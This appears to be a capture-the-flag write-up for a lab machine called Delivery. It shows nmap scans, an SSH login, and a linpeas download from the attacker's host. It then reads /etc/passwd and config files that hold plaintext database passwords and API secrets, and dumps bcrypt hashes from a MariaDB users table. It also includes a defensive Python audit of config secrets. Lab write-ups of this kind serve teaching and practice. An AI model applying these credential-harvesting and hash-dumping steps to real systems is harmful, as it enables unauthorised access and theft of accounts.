delivery


Introduction:

Recon

    nmap -sS -sC -sV -T4 -O -oN nmap.delivery.txt 10.10.10.222
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-10 18:42 EST
    Nmap scan report for 10.10.10.222
    Host is up (0.014s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
    |   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
    |_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
    80/tcp open  http    nginx 1.14.2
    |_http-server-header: nginx/1.14.2
    |_http-title: Welcome
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=1/10%OT=22%CT=1%CU=43575%PV=Y%DS=2%DC=I%G=Y%TM=5FFB90D
    OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
    OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
    OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)

    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds


    Enter your target IP address or URL here: 10.10.10.222

    Scanning target 10.10.10.222
    Time started: 2021-01-10 18:42:42.506364

    Port 22 is open
    Port 80 is open
    Port 8065 is open
    Port scan completed in 0:00:06.923810

nginx/1.14.2

Mattermost running on port 8065

Helpdesk running on helpdesk.delivery.htb

Enumeration

Exploitation

    eneloop@kinetic:~$ ssh [email protected]
    [email protected]'s password:
    Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
    maildeliverer@Delivery:~$

Post-exploit/PrivEsc

    --2021-01-31 10:49:20--  http://10.10.14.38:8000/linpeas.sh
    Connecting to 10.10.14.38:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 313316 (306K) [text/x-sh]
    Saving to: ‘linpeas.sh’

    linpeas.sh 100%[=========================================================================================================================================>] 305.97K --.-KB/s in 0.09s

    2021-01-31 10:49:21 (3.50 MB/s) - ‘linpeas.sh’ saved [313316/313316]

    maildeliverer@Delivery:/tmp$ chmod 755 linpeas.sh
    maildeliverer@Delivery:/tmp$ id
    uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
    maildeliverer@Delivery:/tmp$ cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
    sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
    avahi:x:106:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
    saned:x:107:116::/var/lib/saned:/usr/sbin/nologin
    colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
    hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    maildeliverer:x:1000:1000:MailDeliverer,,,:/home/maildeliverer:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    mysql:x:110:118:MySQL Server,,,:/nonexistent:/bin/false
    mattermost:x:998:998::/home/mattermost:/bin/sh
    maildeliverer@Delivery:/tmp$

    # Default admin email. Used only on db connection issues and related alerts.
    define('ADMIN_EMAIL','[email protected]');

    # Database Options
    # ---------------------------------------------------
    # Mysql Login info
    define('DBTYPE','mysql');
    define('DBHOST','localhost');
    define('DBNAME','osticket');
    define('DBUSER','ost_user');
    define('DBPASS','!H3lpD3sk123!');

    # Table prefix
    define('TABLE_PREFIX','ost_');

}maildeliverer@Delivery:/opt/mattermost/config$ pwd /opt/mattermost/config maildeliverer@Delivery:/opt/mattermost/config$ cat config.json { “ServiceSettings”: { “SiteURL”: “”, “WebsocketURL”: “”, “LicenseFileLocation”: “”, “ListenAddress”: “:8065”, “ConnectionSecurity”: “”, “TLSCertFile”: “”, “TLSKeyFile”: “”, “TLSMinVer”: “1.2”, “TLSStrictTransport”: false, “TLSStrictTransportMaxAge”: 63072000, “TLSOverwriteCiphers”: [], “UseLetsEncrypt”: false, “LetsEncryptCertificateCacheFile”: “./config/letsencrypt.cache”, “Forward80To443”: false, “TrustedProxyIPHeader”: [], “ReadTimeout”: 300, “WriteTimeout”: 300, “IdleTimeout”: 60, “MaximumLoginAttempts”: 10, “GoroutineHealthThreshold”: -1, “GoogleDeveloperKey”: “”, “EnableOAuthServiceProvider”: false, “EnableIncomingWebhooks”: true, “EnableOutgoingWebhooks”: true, “EnableCommands”: true, “EnableOnlyAdminIntegrations”: true, “EnablePostUsernameOverride”: false, “EnablePostIconOverride”: false, “EnableLinkPreviews”: true, “EnableTesting”: false, “EnableDeveloper”: false, “EnableOpenTracing”: false, “EnableSecurityFixAlert”: true, “EnableInsecureOutgoingConnections”: false, “AllowedUntrustedInternalConnections”: “”, “EnableMultifactorAuthentication”: false, “EnforceMultifactorAuthentication”: false, “EnableUserAccessTokens”: false, “AllowCorsFrom”: “”, “CorsExposedHeaders”: “”, “CorsAllowCredentials”: false, “CorsDebug”: false, “AllowCookiesForSubdomains”: false, “ExtendSessionLengthWithActivity”: true, “SessionLengthWebInDays”: 30, “SessionLengthMobileInDays”: 30, “SessionLengthSSOInDays”: 30, “SessionCacheInMinutes”: 10, “SessionIdleTimeoutInMinutes”: 43200, “WebsocketSecurePort”: 443, “WebsocketPort”: 80, “WebserverMode”: “gzip”, “EnableCustomEmoji”: true, “EnableEmojiPicker”: true, “EnableGifPicker”: true, “GfycatApiKey”: “2_KtH_W5”, “GfycatApiSecret”: “3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof”, “RestrictCustomEmojiCreation”: “all”, “RestrictPostDelete”: “all”, “AllowEditPost”: “always”, 
“PostEditTimeLimit”: -1, “TimeBetweenUserTypingUpdatesMilliseconds”: 5000, “EnablePostSearch”: true, “MinimumHashtagLength”: 3, “EnableUserTypingMessages”: true, “EnableChannelViewedMessages”: true, “EnableUserStatuses”: true, “ExperimentalEnableAuthenticationTransfer”: true, “ClusterLogTimeoutMilliseconds”: 2000, “CloseUnusedDirectMessages”: false, “EnablePreviewFeatures”: true, “EnableTutorial”: true, “ExperimentalEnableDefaultChannelLeaveJoinMessages”: true, “ExperimentalGroupUnreadChannels”: “disabled”, “ExperimentalChannelOrganization”: false, “ExperimentalChannelSidebarOrganization”: “disabled”, “ExperimentalDataPrefetch”: true, “ImageProxyType”: “”, “ImageProxyURL”: “”, “ImageProxyOptions”: “”, “EnableAPITeamDeletion”: false, “EnableAPIUserDeletion”: false, “ExperimentalEnableHardenedMode”: false, “DisableLegacyMFA”: true, “ExperimentalStrictCSRFEnforcement”: false, “EnableEmailInvitations”: false, “DisableBotsWhenOwnerIsDeactivated”: true, “EnableBotAccountCreation”: false, “EnableSVGs”: false, “EnableLatex”: false, “EnableAPIChannelDeletion”: false, “EnableLocalMode”: false, “LocalModeSocketLocation”: “/var/tmp/mattermost_local.socket”, “EnableAWSMetering”: false, “SplitKey”: “”, “FeatureFlagSyncIntervalSeconds”: 30, “DebugSplit”: false, “ThreadAutoFollow”: true, “ManagedResourcePaths”: "" }, “TeamSettings”: { “SiteName”: “Mattermost”, “MaxUsersPerTeam”: 5000, “EnableTeamCreation”: true, “EnableUserCreation”: true, “EnableOpenServer”: true, “EnableUserDeactivation”: false, “RestrictCreationToDomains”: “”, “EnableCustomBrand”: false, “CustomBrandText”: “”, “CustomDescriptionText”: “”, “RestrictDirectMessage”: “any”, “RestrictTeamInvite”: “all”, “RestrictPublicChannelManagement”: “all”, “RestrictPrivateChannelManagement”: “all”, “RestrictPublicChannelCreation”: “all”, “RestrictPrivateChannelCreation”: “all”, “RestrictPublicChannelDeletion”: “all”, “RestrictPrivateChannelDeletion”: “all”, “RestrictPrivateChannelManageMembers”: “all”, 
“EnableXToLeaveChannelsFromLHS”: false, “UserStatusAwayTimeout”: 300, “MaxChannelsPerTeam”: 2000, “MaxNotificationsPerChannel”: 1000000, “EnableConfirmNotificationsToChannel”: true, “TeammateNameDisplay”: “username”, “ExperimentalViewArchivedChannels”: true, “ExperimentalEnableAutomaticReplies”: false, “ExperimentalHideTownSquareinLHS”: false, “ExperimentalTownSquareIsReadOnly”: false, “LockTeammateNameDisplay”: false, “ExperimentalPrimaryTeam”: “”, “ExperimentalDefaultChannels”: [] }, “ClientRequirements”: { “AndroidLatestVersion”: “”, “AndroidMinVersion”: “”, “DesktopLatestVersion”: “”, “DesktopMinVersion”: “”, “IosLatestVersion”: “”, “IosMinVersion”: "" }, “SqlSettings”: { “DriverName”: “mysql”, “DataSource”: “mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s”, “DataSourceReplicas”: [], “DataSourceSearchReplicas”: [], “MaxIdleConns”: 20, “ConnMaxLifetimeMilliseconds”: 3600000, “MaxOpenConns”: 300, “Trace”: false, “AtRestEncryptKey”: “n5uax3d4f919obtsp1pw1k5xetq1enez”, “QueryTimeout”: 30, “DisableDatabaseSearch”: false }, “LogSettings”: { “EnableConsole”: true, “ConsoleLevel”: “INFO”, “ConsoleJson”: true, “EnableFile”: true, “FileLevel”: “INFO”, “FileJson”: true, “FileLocation”: “”, “EnableWebhookDebugging”: true, “EnableDiagnostics”: true, “EnableSentry”: true, “AdvancedLoggingConfig”: "" }, “ExperimentalAuditSettings”: { “FileEnabled”: false, “FileName”: “”, “FileMaxSizeMB”: 100, “FileMaxAgeDays”: 0, “FileMaxBackups”: 0, “FileCompress”: false, “FileMaxQueueSize”: 1000, “AdvancedLoggingConfig”: "" }, “NotificationLogSettings”: { “EnableConsole”: true, “ConsoleLevel”: “INFO”, “ConsoleJson”: true, “EnableFile”: true, “FileLevel”: “INFO”, “FileJson”: true, “FileLocation”: “”, “AdvancedLoggingConfig”: "" }, “PasswordSettings”: { “MinimumLength”: 10, “Lowercase”: true, “Number”: true, “Uppercase”: true, “Symbol”: true }, “FileSettings”: { “EnableFileAttachments”: true, “EnableMobileUpload”: 
true, “EnableMobileDownload”: true, “MaxFileSize”: 52428800, “DriverName”: “local”, “Directory”: “./data/”, “EnablePublicLink”: false, “PublicLinkSalt”: “8818u8uiz1n9rykuwgiqttfzgu6iixhz”, “InitialFont”: “nunito-bold.ttf”, “AmazonS3AccessKeyId”: “”, “AmazonS3SecretAccessKey”: “”, “AmazonS3Bucket”: “”, “AmazonS3PathPrefix”: “”, “AmazonS3Region”: “”, “AmazonS3Endpoint”: “s3.amazonaws.com”, “AmazonS3SSL”: true, “AmazonS3SignV2”: false, “AmazonS3SSE”: false, “AmazonS3Trace”: false }, “EmailSettings”: { “EnableSignUpWithEmail”: true, “EnableSignInWithEmail”: true, “EnableSignInWithUsername”: true, “SendEmailNotifications”: false, “UseChannelInEmailNotifications”: false, “RequireEmailVerification”: true, “FeedbackName”: “”, “FeedbackEmail”: “”, “ReplyToAddress”: “”, “FeedbackOrganization”: “”, “EnableSMTPAuth”: false, “SMTPUsername”: “”, “SMTPPassword”: “”, “SMTPServer”: “localhost”, “SMTPPort”: “1025”, “SMTPServerTimeout”: 10, “ConnectionSecurity”: “”, “SendPushNotifications”: true, “PushNotificationServer”: “https://push-test.mattermost.com”, “PushNotificationContents”: “full”, “PushNotificationBuffer”: 1000, “EnableEmailBatching”: false, “EmailBatchingBufferSize”: 256, “EmailBatchingInterval”: 30, “EnablePreviewModeBanner”: true, “SkipServerCertificateVerification”: false, “EmailNotificationContentsType”: “full”, “LoginButtonColor”: “#0000”, “LoginButtonBorderColor”: “#2389D7”, “LoginButtonTextColor”: “#2389D7” }, “RateLimitSettings”: { “Enable”: false, “PerSec”: 10, “MaxBurst”: 100, “MemoryStoreSize”: 10000, “VaryByRemoteAddr”: true, “VaryByUser”: false, “VaryByHeader”: "" }, “PrivacySettings”: { “ShowEmailAddress”: true, “ShowFullName”: true }, “SupportSettings”: { “TermsOfServiceLink”: “https://about.mattermost.com/default-terms/", “PrivacyPolicyLink”: “https://about.mattermost.com/default-privacy-policy/", “AboutLink”: “https://about.mattermost.com/default-about/", “HelpLink”: “https://about.mattermost.com/default-help/", “ReportAProblemLink”: 
“https://about.mattermost.com/default-report-a-problem/", “SupportEmail”: “[email protected]”, “CustomTermsOfServiceEnabled”: false, “CustomTermsOfServiceReAcceptancePeriod”: 365, “EnableAskCommunityLink”: true }, “AnnouncementSettings”: { “EnableBanner”: false, “BannerText”: “”, “BannerColor”: “#f2a93b”, “BannerTextColor”: “#333333”, “AllowBannerDismissal”: true, “AdminNoticesEnabled”: true, “UserNoticesEnabled”: true, “NoticesURL”: “https://notices.mattermost.com/", “NoticesFetchFrequency”: 3600, “NoticesSkipCache”: false }, “ThemeSettings”: { “EnableThemeSelection”: true, “DefaultTheme”: “default”, “AllowCustomThemes”: true, “AllowedThemes”: [] }, “GitLabSettings”: { “Enable”: false, “Secret”: “”, “Id”: “”, “Scope”: “”, “AuthEndpoint”: “”, “TokenEndpoint”: “”, “UserApiEndpoint”: "” }, “GoogleSettings”: { “Enable”: false, “Secret”: “”, “Id”: “”, “Scope”: “profile email”, “AuthEndpoint”: “https://accounts.google.com/o/oauth2/v2/auth", “TokenEndpoint”: “https://www.googleapis.com/oauth2/v4/token", “UserApiEndpoint”: “https://people.googleapis.com/v1/people/me?personFields=names,emailAddresses,nicknames,metadata" }, “Office365Settings”: { “Enable”: false, “Secret”: “”, “Id”: “”, “Scope”: “User.Read”, “AuthEndpoint”: “https://login.microsoftonline.com/common/oauth2/v2.0/authorize", “TokenEndpoint”: “https://login.microsoftonline.com/common/oauth2/v2.0/token", “UserApiEndpoint”: “https://graph.microsoft.com/v1.0/me", “DirectoryId”: "” }, “LdapSettings”: { “Enable”: false, “EnableSync”: false, “LdapServer”: “”, “LdapPort”: 389, “ConnectionSecurity”: “”, “BaseDN”: “”, “BindUsername”: “”, “BindPassword”: “”, “UserFilter”: “”, “GroupFilter”: “”, “GuestFilter”: “”, “EnableAdminFilter”: false, “AdminFilter”: “”, “GroupDisplayNameAttribute”: “”, “GroupIdAttribute”: “”, “FirstNameAttribute”: “”, “LastNameAttribute”: “”, “EmailAttribute”: “”, “UsernameAttribute”: “”, “NicknameAttribute”: “”, “IdAttribute”: “”, “PositionAttribute”: “”, “LoginIdAttribute”: “”, 
“PictureAttribute”: “”, “SyncIntervalMinutes”: 60, “SkipCertificateVerification”: false, “PublicCertificateFile”: “”, “PrivateKeyFile”: “”, “QueryTimeout”: 60, “MaxPageSize”: 0, “LoginFieldName”: “”, “LoginButtonColor”: “#0000”, “LoginButtonBorderColor”: “#2389D7”, “LoginButtonTextColor”: “#2389D7”, “Trace”: false }, “ComplianceSettings”: { “Enable”: false, “Directory”: “./data/”, “EnableDaily”: false }, “LocalizationSettings”: { “DefaultServerLocale”: “en”, “DefaultClientLocale”: “en”, “AvailableLocales”: "” }, “SamlSettings”: { “Enable”: false, “EnableSyncWithLdap”: false, “EnableSyncWithLdapIncludeAuth”: false, “IgnoreGuestsLdapSync”: false, “Verify”: true, “Encrypt”: true, “SignRequest”: false, “IdpUrl”: “”, “IdpDescriptorUrl”: “”, “IdpMetadataUrl”: “”, “ServiceProviderIdentifier”: “”, “AssertionConsumerServiceURL”: “”, “SignatureAlgorithm”: “RSAwithSHA1”, “CanonicalAlgorithm”: “Canonical1.0”, “ScopingIDPProviderId”: “”, “ScopingIDPName”: “”, “IdpCertificateFile”: “”, “PublicCertificateFile”: “”, “PrivateKeyFile”: “”, “IdAttribute”: “”, “GuestAttribute”: “”, “EnableAdminAttribute”: false, “AdminAttribute”: “”, “FirstNameAttribute”: “”, “LastNameAttribute”: “”, “EmailAttribute”: “”, “UsernameAttribute”: “”, “NicknameAttribute”: “”, “LocaleAttribute”: “”, “PositionAttribute”: “”, “LoginButtonText”: “SAML”, “LoginButtonColor”: “#34a28b”, “LoginButtonBorderColor”: “#2389D7”, “LoginButtonTextColor”: “#ffffff” }, “NativeAppSettings”: { “AppDownloadLink”: “https://mattermost.com/download/#mattermostApps", “AndroidAppDownloadLink”: “https://about.mattermost.com/mattermost-android-app/", “IosAppDownloadLink”: “https://about.mattermost.com/mattermost-ios-app/" }, “ClusterSettings”: { “Enable”: false, “ClusterName”: “”, “OverrideHostname”: “”, “NetworkInterface”: “”, “BindAddress”: “”, “AdvertiseAddress”: “”, “UseIpAddress”: true, “UseExperimentalGossip”: false, “EnableExperimentalGossipEncryption”: false, “ReadOnlyConfig”: true, “GossipPort”: 8074, “StreamingPort”: 8075, 
“MaxIdleConns”: 100, “MaxIdleConnsPerHost”: 128, “IdleConnTimeoutMilliseconds”: 90000 }, “MetricsSettings”: { “Enable”: false, “BlockProfileRate”: 0, “ListenAddress”: “:8067” }, “ExperimentalSettings”: { “ClientSideCertEnable”: false, “ClientSideCertCheck”: “secondary”, “EnableClickToReply”: false, “LinkMetadataTimeoutMilliseconds”: 5000, “RestrictSystemAdmin”: false, “UseNewSAMLLibrary”: false, “CloudUserLimit”: 0, “CloudBilling”: false, “EnableSharedChannels”: false }, “AnalyticsSettings”: { “MaxUsersForStatistics”: 2500 }, “ElasticsearchSettings”: { “ConnectionUrl”: “http://localhost:9200”, “Username”: “elastic”, “Password”: “changeme”, “EnableIndexing”: false, “EnableSearching”: false, “EnableAutocomplete”: false, “Sniff”: true, “PostIndexReplicas”: 1, “PostIndexShards”: 1, “ChannelIndexReplicas”: 1, “ChannelIndexShards”: 1, “UserIndexReplicas”: 1, “UserIndexShards”: 1, “AggregatePostsAfterDays”: 365, “PostsAggregatorJobStartTime”: “03:00”, “IndexPrefix”: “”, “LiveIndexingBatchSize”: 1, “BulkIndexingTimeWindowSeconds”: 3600, “RequestTimeoutSeconds”: 30, “SkipTLSVerification”: false, “Trace”: "” }, “BleveSettings”: { “IndexDir”: “”, “EnableIndexing”: false, “EnableSearching”: false, “EnableAutocomplete”: false, “BulkIndexingTimeWindowSeconds”: 3600 }, “DataRetentionSettings”: { “EnableMessageDeletion”: false, “EnableFileDeletion”: false, “MessageRetentionDays”: 365, “FileRetentionDays”: 365, “DeletionJobStartTime”: “02:00” }, “MessageExportSettings”: { “EnableExport”: false, “ExportFormat”: “actiance”, “DailyRunTime”: “01:00”, “ExportFromTimestamp”: 0, “BatchSize”: 10000, “DownloadExportResults”: false, “GlobalRelaySettings”: { “CustomerType”: “A9”, “SmtpUsername”: “”, “SmtpPassword”: “”, “EmailAddress”: “”, “SMTPServerTimeout”: 1800 } }, “JobSettings”: { “RunJobs”: true, “RunScheduler”: true }, “PluginSettings”: { “Enable”: true, “EnableUploads”: false, “AllowInsecureDownloadUrl”: false, “EnableHealthCheck”: true, “Directory”: “./plugins”, “ClientDirectory”: 
“./client/plugins”, “Plugins”: {}, “PluginStates”: { “com.mattermost.nps”: { “Enable”: true }, “com.mattermost.plugin-channel-export”: { “Enable”: true }, “com.mattermost.plugin-incident-management”: { “Enable”: true } }, “EnableMarketplace”: true, “EnableRemoteMarketplace”: true, “AutomaticPrepackagedPlugins”: true, “RequirePluginSignature”: false, “MarketplaceUrl”: “https://api.integrations.mattermost.com”, “SignaturePublicKeyFiles”: [] }, “DisplaySettings”: { “CustomUrlSchemes”: [], “ExperimentalTimezone”: true }, “GuestAccountsSettings”: { “Enable”: false, “AllowEmailAccounts”: true, “EnforceMultifactorAuthentication”: false, “RestrictCreationToDomains”: "” }, “ImageProxySettings”: { “Enable”: false, “ImageProxyType”: “local”, “RemoteImageProxyURL”: “”, “RemoteImageProxyOptions”: "” }, “CloudSettings”: { “CWSUrl”: “https://customers.mattermost.com” } }maildeliverer@Delivery:/opt/mattermost/config$
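The config.json printed above was readable by the unprivileged maildeliverer account and carries the database login inside SqlSettings.DataSource. The following audit is an added example, not part of the original write-up and not Mattermost code: it parses a config of that shape and reports those conditions without echoing any secret value. The function names, finding labels and the sample config (with placeholder secrets) are constructed for illustration.

```python
import json
import re
import stat
from typing import Iterator, List, Optional

# Go MySQL driver DSN layout: user:password@protocol(address)/dbname?params
DSN_RE = re.compile(
    r"^(?P<user>[^:@/]+):(?P<password>.*)@(?P<proto>\w+)"
    r"\((?P<addr>[^)]*)\)/(?P<db>[^?]*)"
)
# Key names that normally hold secret material in this config layout.
SECRET_KEY_RE = re.compile(r"(password|secret|encryptkey|salt)$", re.IGNORECASE)


def parse_dsn(dsn: str) -> Optional[dict]:
    """Split a DataSource string into its parts; None if it does not match."""
    m = DSN_RE.match(dsn)
    return m.groupdict() if m else None


def secret_fields(node, path: str = "") -> Iterator[str]:
    """Yield dotted paths of non-empty string settings with secret-like keys."""
    if not isinstance(node, dict):
        return
    for key, value in node.items():
        child = f"{path}.{key}" if path else key
        if isinstance(value, str) and value and SECRET_KEY_RE.search(key):
            yield child
        else:
            yield from secret_fields(value, child)


def audit(cfg: dict, mode: Optional[int] = None) -> List[str]:
    """Return findings for a parsed config; `mode` is the file's st_mode."""
    findings = []
    dsn = parse_dsn(cfg.get("SqlSettings", {}).get("DataSource", ""))
    if dsn and dsn["password"]:
        # Report who/where, never the password itself.
        findings.append(f"db-credentials-in-file: user={dsn['user']} db={dsn['db']}")
    findings.extend(f"secret-in-file: {p}" for p in secret_fields(cfg))
    if mode is not None and mode & stat.S_IROTH:
        findings.append("world-readable")
    if not cfg.get("RateLimitSettings", {}).get("Enable", False):
        findings.append("rate-limit-disabled")
    if not cfg.get("ServiceSettings", {}).get("EnableMultifactorAuthentication", False):
        findings.append("mfa-disabled")
    return findings


# Constructed sample: same keys as the dump above, placeholder secret values.
SAMPLE_CONFIG = json.loads("""
{
  "ServiceSettings": {"ListenAddress": ":8065",
                      "EnableMultifactorAuthentication": false},
  "SqlSettings": {
    "DriverName": "mysql",
    "DataSource": "mmuser:EXAMPLE_PASSWORD@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8",
    "AtRestEncryptKey": "EXAMPLE_KEY"
  },
  "EmailSettings": {"SMTPPassword": ""},
  "RateLimitSettings": {"Enable": false}
}
""")

if __name__ == "__main__":
    # 0o644 stands in for a config file any local account can read.
    for finding in audit(SAMPLE_CONFIG, mode=0o644):
        print(finding)
```

On a live host, pass `os.stat(path).st_mode` as `mode`. Mattermost also reads settings from `MM_`-prefixed environment variables such as `MM_SQLSETTINGS_DATASOURCE`, so the DSN does not have to be stored in the file.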

    maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p -D mattermost
    Enter password:
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Welcome to the MariaDB monitor. Commands end with ; or \g.
    Your MariaDB connection id is 81
    Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    MariaDB [mattermost]> show tables;
    +------------------------+
    | Tables_in_mattermost   |
    +------------------------+
    | Audits                 |
    | Bots                   |
    | ChannelMemberHistory   |
    | ChannelMembers         |
    | Channels               |
    | ClusterDiscovery       |
    | CommandWebhooks        |
    | Commands               |
    | Compliances            |
    | Emoji                  |
    | FileInfo               |
    | GroupChannels          |
    | GroupMembers           |
    | GroupTeams             |
    | IncomingWebhooks       |
    | Jobs                   |
    | Licenses               |
    | LinkMetadata           |
    | OAuthAccessData        |
    | OAuthApps              |
    | OAuthAuthData          |
    | OutgoingWebhooks       |
    | PluginKeyValueStore    |
    | Posts                  |
    | Preferences            |
    | ProductNoticeViewState |
    | PublicChannels         |
    | Reactions              |
    | Roles                  |
    | Schemes                |
    | Sessions               |
    | SidebarCategories      |
    | SidebarChannels        |
    | Status                 |
    | Systems                |
    | TeamMembers            |
    | Teams                  |
    | TermsOfService         |
    | ThreadMemberships      |
    | Threads                |
    | Tokens                 |
    | UploadSessions         |
    | UserAccessTokens       |
    | UserGroups             |
    | UserTermsOfService     |
    | Users                  |
    +------------------------+
    46 rows in set (0.001 sec)

    MariaDB [mattermost]> desc users;
    ERROR 1146 (42S02): Table 'mattermost.users' doesn't exist
    MariaDB [mattermost]> sesc Users
        -> ;
    ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'sesc Users' at line 1
    MariaDB [mattermost]> describe Users;
    +--------------------+--------------+------+-----+---------+-------+
    | Field              | Type         | Null | Key | Default | Extra |
    +--------------------+--------------+------+-----+---------+-------+
    | Id                 | varchar(26)  | NO   | PRI | NULL    |       |
    | CreateAt           | bigint(20)   | YES  | MUL | NULL    |       |
    | UpdateAt           | bigint(20)   | YES  | MUL | NULL    |       |
    | DeleteAt           | bigint(20)   | YES  | MUL | NULL    |       |
    | Username           | varchar(64)  | YES  | UNI | NULL    |       |
    | Password           | varchar(128) | YES  |     | NULL    |       |
    | AuthData           | varchar(128) | YES  | UNI | NULL    |       |
    | AuthService        | varchar(32)  | YES  |     | NULL    |       |
    | Email              | varchar(128) | YES  | UNI | NULL    |       |
    | EmailVerified      | tinyint(1)   | YES  |     | NULL    |       |
    | Nickname           | varchar(64)  | YES  |     | NULL    |       |
    | FirstName          | varchar(64)  | YES  |     | NULL    |       |
    | LastName           | varchar(64)  | YES  |     | NULL    |       |
    | Position           | varchar(128) | YES  |     | NULL    |       |
    | Roles              | text         | YES  |     | NULL    |       |
    | AllowMarketing     | tinyint(1)   | YES  |     | NULL    |       |
    | Props              | text         | YES  |     | NULL    |       |
    | NotifyProps        | text         | YES  |     | NULL    |       |
    | LastPasswordUpdate | bigint(20)   | YES  |     | NULL    |       |
    | LastPictureUpdate  | bigint(20)   | YES  |     | NULL    |       |
    | FailedAttempts     | int(11)      | YES  |     | NULL    |       |
    | Locale             | varchar(5)   | YES  |     | NULL    |       |
    | Timezone           | text         | YES  |     | NULL    |       |
    | MfaActive          | tinyint(1)   | YES  |     | NULL    |       |
    | MfaSecret          | varchar(128) | YES  |     | NULL    |       |
    +--------------------+--------------+------+-----+---------+-------+
    25 rows in set (0.001 sec)

    MariaDB [mattermost]> select Username,Password from Users;
    +----------------------------------+--------------------------------------------------------------+
    | Username                         | Password                                                     |
    +----------------------------------+--------------------------------------------------------------+
    | surveybot                        |                                                              |
    | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
    | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
    | enp                              | $2a$10$6Uc2Om6TCrk9ts.aVY6L5.giMnMvdMREoDOrpqGJB6.Omp90R9SlW |
